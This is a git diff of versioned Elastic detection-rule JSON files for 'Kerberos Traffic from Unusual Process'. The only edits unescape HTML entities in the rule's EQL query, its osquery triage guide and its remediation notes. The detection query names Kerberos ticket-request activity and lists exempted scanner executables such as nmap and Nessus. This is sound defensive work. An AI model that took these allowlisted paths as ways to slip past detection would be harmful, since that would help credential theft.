!{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port \u003e= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", "related_integrations": [ { "package": "endpoint", @@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_106.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_106.json index cc84f7af7d4..1e02eeef934 100644 --- a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_106.json +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_106.json @@ -16,8 +16,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port \u003e= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", "related_integrations": [ { "package": "endpoint", @@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_107.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_107.json index 6bd3408824d..c6d6ca91671 100644 --- a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_107.json +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_107.json @@ -16,8 +16,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the 